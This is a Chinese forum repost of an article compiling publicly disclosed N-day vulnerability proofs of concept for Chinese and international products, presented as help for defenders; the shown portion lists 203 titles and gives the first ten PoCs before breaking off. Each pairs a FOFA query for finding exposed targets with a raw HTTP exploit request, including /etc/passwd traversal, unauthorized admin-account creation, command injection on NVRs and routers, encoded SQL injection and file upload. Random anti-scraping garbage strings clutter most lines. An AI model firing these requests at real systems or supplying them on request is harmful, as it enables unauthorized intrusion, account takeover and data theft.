找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1548|回复: 0

互联网公开漏洞整理202309-202406--转载

[复制链接]
发表于 2024-6-5 14:31:29 | 显示全部楼层 |阅读模式
互联网公开漏洞整理202309-202406
+ B0 w3 P2 }% D% ~" P道一安全 2024-06-05 07:41 北京
  @9 O/ n$ U/ n, Z) \! ~以下文章来源于网络安全新视界 ,作者网络安全新视界
% P" {/ U3 T+ k. f6 T, \: w. o: p. m# S" H8 r: y
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。. X& u# v- w" Q6 ?! b1 m

' B, X; z) i7 Z漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。, [7 W7 d$ G0 j1 ~' e3 M4 e
$ H- k( w: E& K- X0 Q
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
$ R* t3 y* z3 t+ t: @" z  v: w" Z4 j. ~, O! S5 K( I) k
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
9 @: v, K6 y7 o' e6 T
5 m& ^8 ~; y- m合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。$ c7 p$ v1 q7 S5 B; d) A
4 F1 C" V7 Q3 I

  _; ~/ P% U; T' j声明
7 a2 \; A* k0 c/ L5 c
% a$ T  G+ b$ Y; _9 C6 b为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。% k* K2 v2 s( k4 ?8 |8 C
& Y, i5 B8 O5 _; t  w/ A5 k
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
3 u0 x3 ~( t4 U9 s6 `2 `; c5 I' k9 @! a0 R- g

5 c( h0 W) E3 T. r4 t% \( E) y% s
目录6 c- ?' _" O  P' v* {
5 C, H. ]  W% s
01
( e1 E9 m6 p/ v5 P/ o
' B# \( E1 O8 j( e' z$ G! ]1. StarRocks MPP数据库未授权访问/ u; t4 L3 N8 M5 y3 X5 B" T" A
2. Casdoor系统static任意文件读取# c8 Q' `( `' K. m: ^9 d% h1 M
3. EasyCVR智能边缘网关 userlist 信息泄漏
0 A" H1 o) T  a' t8 J4. EasyCVR视频管理平台存在任意用户添加
1 K  X5 h0 w# O6 Y- S8 r5. NUUO NVR 视频存储管理设备远程命令执行8 o2 ?1 f1 v9 t6 l! p
6. 深信服 NGAF 任意文件读取7 Z8 E1 u7 |7 I- X
7. 鸿运主动安全监控云平台任意文件下载7 S) s9 [( `3 D0 W4 L: E
8. 斐讯 Phicomm 路由器RCE9 o8 ]8 }. E4 u5 a* \
9. 稻壳CMS keyword 未授权SQL注入
/ f* K0 Z1 j. H: r- ^+ n7 B10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ d0 d+ f- Z7 `5 k" Y: {+ J1 |
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 u- `6 ]% M  z3 S12. Jorani < 1.0.2 远程命令执行  }. u, a0 k9 H+ V  t& R
13. 红帆iOffice ioFileDown任意文件读取
7 b9 S$ k1 M) R# L5 F14. 华夏ERP(jshERP)敏感信息泄露8 p$ O( K! g* T
15. 华夏ERP getAllList信息泄露
. y7 F8 @4 i/ m! _/ ]3 m16. 红帆HFOffice医微云SQL注入
9 t; z- u' _4 s+ b' |9 z- q17. 大华 DSS itcBulletin SQL 注入3 C1 B# U5 V1 I  }6 |
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
& f5 h6 }* |1 |, K" y, S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
7 r+ i! @& B0 e% @20. 大华ICC智能物联综合管理平台任意文件读取
# e0 ?$ @! [9 u# _2 `+ }21. 大华ICC智能物联综合管理平台random远程代码执行' X  l) h% C3 q1 ?" ~6 [# u
22. 大华ICC智能物联综合管理平台 log4j远程代码执行) K) ~% X- Y$ j2 O
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 u$ _. t5 {* r+ {24. 用友NC 6.5 accept.jsp任意文件上传
, p8 w" r3 R+ S4 |25. 用友NC registerServlet JNDI 远程代码执行1 J4 A# A7 R* W/ X" H  H  F% a
26. 用友NC linkVoucher SQL注入9 V/ p0 H3 V$ ~9 r
27. 用友 NC showcontent SQL注入
0 X. ^9 T% |& F- o5 q28. 用友NC grouptemplet 任意文件上传
& C. n2 E$ a; @8 i/ @, E29. 用友NC down/bill SQL注入  b( S" k1 ?$ a! Z
30. 用友NC importPml SQL注入3 q4 y8 G. ]* Y+ ?) a
31. 用友NC runStateServlet SQL注入
7 E4 k: t3 v4 `2 ~9 [4 \6 U32. 用友NC complainbilldetail SQL注入, s* v& b! g: q$ K: D8 Q) d
33. 用友NC downTax/download SQL注入# x. X& ]. y7 O, l. y
34. 用友NC warningDetailInfo接口SQL注入
3 P- e- F& E9 X" b* M35. 用友NC-Cloud importhttpscer任意文件上传* J) q$ P) |0 T1 v; ~4 \
36. 用友NC-Cloud soapFormat XXE
, ]0 H  R  y" W3 h" \37. 用友NC-Cloud IUpdateService XXE) G* h% Z" n4 U. s$ _- v
38. 用友U8 Cloud smartweb2.RPC.d XXE
, |) {0 i% X7 @) R' Z39. 用友U8 Cloud RegisterServlet SQL注入9 u) k& N4 Q5 l0 d4 I- |! j; w& B
40. 用友U8-Cloud XChangeServlet XXE
3 c3 M/ r* f! D; T41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
. y$ I5 G" W7 `2 e42. 用友GRP-U8 SmartUpload01 文件上传/ @4 N% U3 q0 R* _: G4 w8 ]
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: n7 O( s- F( p# Z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入. h) z; w+ W" m* a9 p" `
45. 用友GRP-U8 ufgovbank XXE4 Y) S$ |& k3 i. i3 }
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
! g! r; n' q% A8 V# P47. 用友GRP A++Cloud 政府财务云 任意文件读取
* i; ]: b+ ?- n  J48. 用友U8 CRM swfupload 任意文件上传
9 w8 J' D! k7 g7 U2 \  L  v49. 用友U8 CRM系统uploadfile.php接口任意文件上传- R; S7 Z. F) c
50. QDocs Smart School 6.4.1 filterRecords SQL注入
  z' n5 S2 ~& E" \51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, p8 z( \( f" d: b' K; x- k( R; W
52. 泛微E-Office json_common.php sql注入
8 n' `3 \2 V7 p53. 迪普 DPTech VPN Service 任意文件上传' R9 A  W1 _# n0 ^% o( c; x" ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行- k& u3 I3 F, J# d, q
55. 畅捷通T+ getdecallusers信息泄露5 x* }! v" @6 P1 {% v& q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE% ~( t; b0 R1 R8 J
57. 畅捷通T+ keyEdit.aspx SQL注入) S6 j$ r6 ~. |# S8 R8 s6 Z9 I
58. 畅捷通T+ KeyInfoList.aspx sql注入
, n% w: a9 A3 c# `* y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ ~% Z0 r) s( J" z* I' W7 \8 e60. 百卓Smart管理平台 importexport.php SQL注入/ g* O7 T' P* z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传& n0 \% \+ z# Y" A7 V' i  Q
62. IP-guard WebServer 远程命令执行
- @$ g' }0 ^4 j" H4 |2 a% K9 w63. IP-guard WebServer任意文件读取& C, A- ^4 b: z4 n
64. 捷诚管理信息系统CWSFinanceCommon SQL注入1 j8 z/ M( Z7 c6 e
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过7 w: M- Q& K  M- c* S* B
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入+ E& B( x- l& L( h, a  w
67. 万户ezOFFICE wpsservlet任意文件上传" p, b/ {/ q8 y2 G) @+ ^
68. 万户ezOFFICE wf_printnum.jsp SQL注入
4 ^% w# x2 R& W' l. Y69. 万户 ezOFFICE contract_gd.jsp SQL注入+ g8 K; I7 a. H0 v
70. 万户ezEIP success 命令执行
0 B# C' D$ v: b6 u6 }" L* ^71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# ^0 h/ O6 N+ ~, G* j5 s72. 致远OA getAjaxDataServlet XXE
( d, e7 _1 @8 }; N$ }. t73. GeoServer wms远程代码执行
  ?+ Q$ [, r; Z- f  K7 e' _8 F74. 致远M3-server 6_1sp1 反序列化RCE
& X2 B/ n$ i, g# p6 N" ^2 @" Q75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! N% p4 y* ^1 T/ F. S, I
76. 新开普掌上校园服务管理平台service.action远程命令执行
" D2 }( ^" X8 i1 k) G77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 J: I7 b: Y% x: o& u/ ?9 R& s78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ t" e/ x, f, a; S% Q# O3 A
79. BYTEVALUE 百为流控路由器远程命令执行
6 L9 E+ g4 z# c' J: D$ \' `80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
  d+ R' w5 E8 ~0 ^% e! s9 U+ i81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露  Q, _0 w1 b) M: R2 ~
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行- s; E* W$ o: J8 R. \
83. JeecgBoot testConnection 远程命令执行
: N6 n3 v- }, Z9 {3 o, }84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ L1 L" G! k8 E3 ~) @! _
85. SysAid On-premise< 23.3.36远程代码执行
0 e% V: q7 }( C86. 日本tosei自助洗衣机RCE# H8 I2 {- n6 l% L' S  ?& q$ y
87. 安恒明御安全网关aaa_local_web_preview文件上传
- H5 k( o8 ~0 B88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行$ R# E( d; f! j
89. 致远互联FE协作办公平台editflow_manager存在sql注入6 T! s- D6 h  T2 _7 [
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, P6 v' j$ F: z  o2 J) q. H: ]
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ m& {! p( w: D! v. P4 @92. 海康威视运行管理中心session命令执行# T9 P% b# Z/ @& F8 G9 M
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
2 U0 p9 Y9 F* Z0 V0 H94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传: v' u9 h9 g# c1 ]! G- f5 h( f5 E( H
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行6 ^8 y: ?4 }. e6 I7 G' Z
96. Apache OFBiz  18.12.11 groovy 远程代码执行& \5 [& b( ~- T0 P
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 E( ]2 B; R; W5 b  f7 n9 k9 O. K
98. SpiderFlow爬虫平台远程命令执行
* p+ k# ], w1 G6 k, a99. Ncast盈可视高清智能录播系统busiFacade RCE( Z! Z0 p! s6 w: n  t& g, x
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 k; @' }5 h8 B3 R' ?
101. ivanti policy secure-22.6命令注入
) |$ `  Y3 `8 Z7 q1 I102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
: @- V0 S" h0 X103. Ivanti Pulse Connect Secure VPN XXE
; S3 y- `/ ?: b104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
: ]6 w1 @$ V, d+ Y' o, X105. SpringBlade v3.2.0 export-user SQL 注入8 g$ k4 R- G3 w! X/ f
106. SpringBlade dict-biz/list SQL 注入4 M$ w1 `7 ]1 ^/ v0 ?( O% V  q
107. SpringBlade tenant/list SQL 注入
; d% ?9 M& ]- K9 I0 E, F108. D-Tale 3.9.0 SSRF
% d/ d' P' U# M: b4 ~( D0 V109. Jenkins CLI 任意文件读取& H6 A2 u3 }2 ^% |! M& T
110. Goanywhere MFT 未授权创建管理员
1 F% [9 b1 c+ T  G111. WordPress Plugin HTML5 Video Player SQL注入
0 j- R6 P( g: J- ~112. WordPress Plugin NotificationX SQL 注入& l  [/ Y* Q, C0 `/ m2 I5 t
113. WordPress Automatic 插件任意文件下载和SSRF/ Z  e: s; f& s8 _, @: S
114. WordPress MasterStudy LMS插件 SQL注入4 U& J- Y; V+ \- X2 _3 V
115. WordPress Bricks Builder <= 1.9.6 RCE( i' u5 T, p; o/ S, u# ?
116. wordpress js-support-ticket文件上传4 q+ s3 @" f' L' s9 B  E
117. WordPress LayerSlider插件SQL注入
% W0 v" N7 [4 L( \( C9 C# P! C118. 北京百绰智能S210管理平台uploadfile.php任意文件上传* i8 n/ |( I: N5 F1 ^+ \
119. 北京百绰智能S20后台sysmanageajax.php sql注入% X8 y( e& Z9 f  x$ m' u1 P$ q
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 [* W& F" ~, j" {5 }/ t& N121. 北京百绰智能S42管理平台userattestation.php任意文件上传
$ q. y! G* d0 B5 ]122. 北京百绰智能s200管理平台/importexport.php sql注入) B2 X0 a9 _  N' G) |2 z' |
123. Atlassian Confluence 模板注入代码执行
/ M, @, ]; c/ `( z- d$ R$ R124. 湖南建研工程质量检测系统任意文件上传* J$ v0 |1 P, ~  E% d) v! w
125. ConnectWise ScreenConnect身份验证绕过
- y0 r" Z/ i1 i. H" Y126. Aiohttp 路径遍历! N! [0 ^) D9 e
127. 广联达Linkworks DataExchange.ashx XXE8 ?! |/ {! B8 l' i) ^* V
128. Adobe ColdFusion 反序列化
5 o1 h( D$ L1 b129. Adobe ColdFusion 任意文件读取
' P6 p, e& |. {) [# a) J130. Laykefu客服系统任意文件上传
! W. o  X. b  Z9 j4 T; I  A131. Mini-Tmall <=20231017 SQL注入4 X+ [0 s+ g2 ]7 f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# S! V) ]& s/ i# W0 Z' ?/ r1 Y
133. H5 云商城 file.php 文件上传
7 C5 W6 f) |1 h0 @/ D6 N134. 网康NS-ASG应用安全网关index.php sql注入1 g- V7 K. ~  B  L2 _2 p
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 l3 v$ s# g$ F+ ]
136. NextChat cors SSRF( J' z  |) d; `  w
137. 福建科立迅通信指挥调度平台down_file.php sql注入
# ~6 J4 D+ L( q/ Y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 _# h) f/ J% ^) ?! z; G
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* M" E3 E+ Q; j9 ]1 ^140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ _( ?# W* ?( J( g141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% Y8 y. L/ R( h" p! D4 j2 e142. CMSV6车辆监控平台系统中存在弱密码& j: @7 P: R4 V+ g& F9 l) h& R
143. Netis WF2780 v2.1.40144 远程命令执行
& a2 |- W6 z9 l4 R4 z2 U( N144. D-Link nas_sharing.cgi 命令注入# J9 p' g+ v) ^* ~* n9 I
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入1 R0 d" W+ r& G( {$ z$ u- J! @
146. MajorDoMo thumb.php 未授权远程代码执行9 |6 G+ m6 ?6 j  ~/ z( k+ F0 @
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# Y2 J  [" [9 S+ e* q9 s148. CrushFTP 认证绕过模板注入
% E9 j* _/ M! |7 y4 X) b6 z149. AJ-Report开源数据大屏存在远程命令执行
2 t2 Y7 {! I0 e# _! q. [150. AJ-Report 1.4.0 认证绕过与远程代码执行! _4 v3 k) g+ A. K, K* K, B
151. AJ-Report 1.4.1 pageList sql注入
% ~$ x" k/ M  w3 d  `152. Progress Kemp LoadMaster 远程命令执行
3 a  M# A8 e2 \  W$ l8 d* d153. gradio任意文件读取
3 |; @" g) U$ ~* M) O154. 天维尔消防救援作战调度平台 SQL注入
6 z4 p. M9 c3 D155. 六零导航页 file.php 任意文件上传* E4 Z9 {+ A) O9 |
156. TBK DVR-4104/DVR-4216 操作系统命令注入3 K2 H* o# y+ m  E2 j) @
157. 美特CRM upload.jsp 任意文件上传
2 c* A. B2 W; t5 w9 s+ D& Z5 i/ o. g) |158. Mura-CMS-processAsyncObject存在SQL注入
& {" _3 \  ]6 H159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传- f4 W" {, }6 m0 y# B3 m
160. Sonatype Nexus Repository 3目录遍历与文件读取
0 y/ D$ j# p" ]$ U6 [. J5 E161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传) @+ T- Y6 @6 p( L$ f# z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 z' |! l+ e0 R, I
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传( p% i3 \2 }5 b# P
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传  }, `, h0 k/ u1 {( w
165. OrangeHRM 3.3.3 SQL 注入1 N% W1 n$ z8 z+ a; g' D
166. 中成科信票务管理平台SeatMapHandler SQL注入/ w1 l- s' m/ @/ {) i  z
167. 精益价值管理系统 DownLoad.aspx任意文件读取
8 `& Z3 d' D5 Y168. 宏景EHR OutputCode 任意文件读取
& Z) `* M. |7 f169. 宏景EHR downlawbase SQL注入7 S% U! R% K; k* T
170. 宏景EHR DisplayExcelCustomReport 任意文件读取( e& c0 e1 y. W/ u& z
171. 通天星CMSV6车载定位监控平台 SQL注入
0 o" c1 b+ P" u' n' p% S$ a172. DT-高清车牌识别摄像机任意文件读取6 P" U$ L3 a# y" n' W
173. Check Point 安全网关任意文件读取
+ q" G7 `" `9 f$ h' `174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 ], U6 V  I! }* Z175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
" R5 D/ \4 X, ?5 ]176. 电信网关配置管理系统 rewrite.php 文件上传
/ W5 ]  z% {& f1 t7 a) C. u177. H3C路由器敏感信息泄露
) x, G9 o0 P3 N178. H3C校园网自助服务系统-flexfileupload-任意文件上传
7 q! A) D. s) q: ^9 b179. 建文工程管理系统存在任意文件读取' h, h% [8 \5 K
180. 帮管客 CRM jiliyu SQL注入
) y1 l- h  f' e- ^181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% u  E4 D6 R1 R  a: m$ Z182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
7 N' V# x3 W1 {9 f, i, F3 A$ ?183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
5 Z: u; L; z; w1 F3 ], I+ K184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加& s6 s8 r& A0 d- I
185. 瑞友天翼应用虚拟化系统SQL注入4 c; Q. @  T- a8 p* H, ^, N
186. F-logic DataCube3 SQL注入$ C/ b0 |. j& I; V
187. Mura CMS processAsyncObject SQL注入
0 w; L5 U  S  D: D1 X8 I8 R188. 叁体-佳会视频会议 attachment 任意文件读取
- E- e0 s3 B/ @$ Q) f4 n189. 蓝网科技临床浏览系统 deleteStudy SQL注入
; ?+ G3 |# t( Z2 z190. 短视频矩阵营销系统 poihuoqu 任意文件读取" Q; |4 F% L) m$ }
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入. n( s- O4 |, i9 `8 K
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
7 K6 j# n  k, d) n0 p193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, c" Z. [7 o, T; r. o194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
1 h3 [8 x  G$ @3 ?- U/ ^; u195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: ]; t; l$ ]$ k- j3 a2 T% X
196. 河南省风速科技统一认证平台密码重置: Z3 H) {0 L0 s' h! D& s
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
+ R8 u, B# e  H7 m198.  阿里云盘 WebDAV 命令注入
$ j. C1 g1 w9 V3 J5 c2 A199. cockpit系统assetsmanager_upload接口 文件上传1 X- h) D- x: H5 s  ^
200. SeaCMS海洋影视管理系统dmku SQL注入8 o1 ]7 |* l+ U, F. c
201. 方正全媒体新闻采编系统 binary SQL注入5 y" j3 f1 Z$ [. j  _! p0 A4 u
202. 微擎系统 AccountEdit任意文件上传# K; j2 s0 J% j/ o) F4 w
203. 红海云EHR PtFjk 文件上传- p5 r: J4 {8 N# g
+ z3 q( }! [, ?0 y
POC列表# _9 S9 H- L/ K" t( d3 ]8 l  z
5 ~  F* V5 ?* U' g- P: y& W8 x% ]
02
( e. k9 Q9 G7 q% Q
4 N5 N. M( K6 j- g. `1. StarRocks MPP数据库未授权访问# f4 W; x4 z+ f$ N
FOFA :title="StarRocks"
3 f$ J( [+ X" [% A5 |2 y6 q# TGET /mem_tracker HTTP/1.1: P+ q+ q+ y9 P$ j, h+ ^9 N
Host: URL( Z; d# q. Z" n

# ?  w" R0 C, f; M, c' ?% h: Y0 }3 D! L+ e: I7 @
2. Casdoor系统static任意文件读取& p1 @9 n/ p' R$ x& ~0 \& {
FOFA :title="Casdoor"( E- Y( g& G* Z( o) u" F8 _) Y
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1# R/ t. {. J; b9 T, X& q
Host: xx.xx.xx.xx:9999
4 W$ \* f: f& e8 F5 BUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' }7 c. H+ g; L3 T2 l3 y. @
Connection: close/ w- Y8 |3 V& ?) ]! G8 d0 k
Accept: */*
3 U/ T3 g: ]5 T* O9 M( n) r. JAccept-Language: en
/ l& f# {! \0 g; S1 jAccept-Encoding: gzip0 E) x: Q# g  c/ V  G& G

5 F' h  P0 w% m* C4 F* q. k6 W) G5 E3 m) b3 u9 Q
3. EasyCVR智能边缘网关 userlist 信息泄漏
3 m; v+ r, A' X1 C( ~7 n4 pFOFA :title="EasyCVR"+ F& i, ?  O2 L3 m; J+ d
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1% E4 `7 c* }5 I+ m
Host: xx.xx.xx.xx$ @' c' d4 K& ^* v0 \! @

* h* l8 X7 P7 E; u' h; p1 K3 E) C5 ^/ @; w
4. EasyCVR视频管理平台存在任意用户添加
; V" c* f% A0 NFOFA :title="EasyCVR". D" X2 U& r3 I3 \$ X$ y5 M

+ a6 k& Q' T( A* Y1 k4 O( Tpassword更改为自己的密码md5- r# l0 ]1 \1 Y0 u! [
POST /api/v1/adduser HTTP/1.11 u8 e# B! I( s! @2 V4 _$ P$ G
Host: your-ip
4 C' K! T: k4 C& q0 G! X# GContent-Type: application/x-www-form-urlencoded; charset=UTF-8- R( t+ n9 M! A$ O' w8 Z% P

% g2 _5 f1 H1 K. P. Bname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
% D& l, G1 \. L" `+ Q- Z& a2 }7 t4 O- x' x7 G# _2 I1 _# ]! \
+ z! E2 D) {) e; J
5. NUUO NVR 视频存储管理设备远程命令执行6 u/ w% d! g& _3 F% @+ N& W* u
FOFA:title="Network Video Recorder Login"6 O$ @$ h( ~. D4 C: z
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
* h3 R  {7 {: G# _9 iHost: xx.xx.xx.xx* t1 d2 `2 q; y; j. B/ r$ |' q

+ W- `* y7 s" f, h% N0 `+ }# a! m2 R( Q7 c' q, X( i
6. 深信服 NGAF 任意文件读取
4 |( X; D" S( t1 r+ F* l: LFOFA:title="SANGFOR | NGAF"
* |+ c2 g* ]7 B9 T) BGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1( W3 g9 ?- c3 Z4 H2 j3 Y; s7 W! b
Host:. Z6 Y/ f/ G+ K: d
; W% j1 g( Y  z7 u+ W; f8 N4 _0 h

; O$ H) N! R3 M, ]7. 鸿运主动安全监控云平台任意文件下载
6 u/ k* C" X4 S  _" B( c: IFOFA:body="./open/webApi.html"6 W- ?6 Y: f/ s3 J* F( R
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
& d6 K' K+ \' F# `, k* BHost:
* i9 j' g! j+ R1 J! z8 s4 Q/ H
8 \8 L8 g+ H+ C; X, V$ m1 `8 z- R, t0 ?* l7 ^3 x
8. 斐讯 Phicomm 路由器RCE; B. A3 C. _" u& H! _
FOFA:icon_hash="-1344736688"
! \# x" R9 t6 Q1 P. s& \8 l+ p9 o3 B" Y默认账号admin登录后台后,执行操作
1 M: e" c, n  S* a! k3 FPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.13 |1 I% y$ ~) b% g
Host: x.x.x.x" U1 p9 ~) }  `/ i- Z9 e# B
Cookie: sysauth=第一步登录获取的cookie4 ^$ J# n+ y/ }1 a1 m! u2 P, Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz, T" A: @9 M4 J/ }2 o5 [
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" {1 I* T$ T8 K& ?0 n' I
8 ~. y* {, |' V: e5 J  L------WebKitFormBoundaryxbgjoytz
' G/ l0 `' j# fContent-Disposition: form-data; name="wifiRebootEnablestatus"
( Z0 p8 H( l2 O' ?6 r. k& b4 _" P/ p7 ?
%s6 G' f2 p% w' N" x% I+ q) X% k. h
------WebKitFormBoundaryxbgjoytz
' A+ r3 d+ [( d- m7 |Content-Disposition: form-data; name="wifiRebootrange"
9 B1 p/ f9 E" A6 s' R  i& G
6 b& k' y) U) H( g1 N0 `/ ~# I12:00; id;6 ]: c4 U: @5 i0 \
------WebKitFormBoundaryxbgjoytz
- E+ B1 u9 ?- l; n. K1 wContent-Disposition: form-data; name="wifiRebootendrange"8 g4 I8 t" R* V- k
  O: O/ m+ n* f9 s/ x2 A+ E
%s:
3 y0 \) N0 g' n/ \------WebKitFormBoundaryxbgjoytz2 D' f6 t" f: ?+ E) F- L9 N2 b
Content-Disposition: form-data; name="cururl2"
4 d4 S) P5 l$ ?# v9 H3 K
4 C, A9 B) D2 [" p
7 k$ j6 z: r+ s7 i/ z------WebKitFormBoundaryxbgjoytz--% [6 I$ Q. v  ]; K

( m7 C$ P9 J1 `- l
& G+ C- |7 \6 Z3 o" Q! T, r9. 稻壳CMS keyword 未授权SQL注入
8 e8 i2 s7 z3 _) u+ H8 x$ \& OFOFA:app="Doccms"/ M5 v( U; w- s$ K
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1) V7 M. b! S: f
Host: x.x.x.x" O* K+ X! c8 v) g- r" w

0 E7 ]+ w& a" Z) V$ U5 ?' F2 o
) W3 x3 f  p+ t& L; dpayload为下列语句的二次Url编码
: M& F0 ]  z3 T( D1 X) c6 U/ D9 s- N$ h' x
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
) }& A. }& v: b: J5 [; F0 [# A, h
; C4 O, Q8 F7 h! a10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
! M8 k7 a$ |8 SFOFA:icon_hash="953405444"
) Z( V4 x& R3 R9 b/ |+ c4 [; G
% j: Q- d  _0 i( Z. D# e文件上传后响应中包含上传文件的路径) A9 E* C. p* v. i" f' B- {3 o% Y
POST /eis/service/api.aspx?action=saveImg HTTP/1.1( h, k/ {9 N6 a! r* F
Host: x.x.x.x:xx8 Z& X' n( @+ _- c5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* [2 K. v9 m. Z4 V! E! n0 jContent-Length: 197, q' @- E8 e; ^! O& Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 A# j+ {+ N( h: o8 ~
Accept-Encoding: gzip, deflate7 J* }7 q/ D' S& z+ m
Accept-Language: zh-CN,zh;q=0.9
+ \3 a! d- k' s. @  x& n3 v+ q' n8 w9 xConnection: close4 r: O& b$ W% k& v' }; I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu3 v7 w" y& u$ \/ S9 Y* F

& {8 ?  j3 p& b# Z2 q------WebKitFormBoundaryxdgaqmqu* g3 M/ y: m1 V! y0 B3 d* O# B( a
Content-Disposition: form-data; name="file"filename="icfitnya.txt"# Q3 j' \: D1 I
Content-Type: text/html: N3 n9 d: c+ u0 H; z' E

2 z" o% Y' ^) ^! o1 Wjmnqjfdsupxgfidopeixbgsxbf
: n+ E2 ~! `+ ]- S------WebKitFormBoundaryxdgaqmqu--' B2 O6 l; S1 U

/ V' Z9 N7 D' K% P9 B+ R
' |- z; U1 h3 p5 x( L11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入8 o5 C; }! p, A+ b& g" O
